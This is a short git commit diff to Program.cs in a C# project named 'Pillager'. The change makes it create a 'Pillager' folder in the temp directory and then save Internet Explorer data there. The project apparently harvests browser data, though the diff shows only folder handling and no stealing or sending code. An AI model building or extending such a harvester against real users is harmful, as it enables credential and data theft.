Update Program.cs
This commit is contained in:
parent
2376b54c2b
commit
e4ff9d7074
|
@ -9,7 +9,11 @@ namespace Pillager
|
|||
{
|
||||
static void Main(string[] args)
|
||||
{
|
||||
string savepath = Path.GetTempPath();
|
||||
string savepath = Path.Combine(Path.GetTempPath(), "Pillager");
|
||||
if (!Directory.Exists(savepath))
|
||||
{
|
||||
Directory.CreateDirectory(savepath);
|
||||
}
|
||||
|
||||
//IE
|
||||
IE.Save(savepath);
|
||||
|
|
Loading…
Reference in New Issue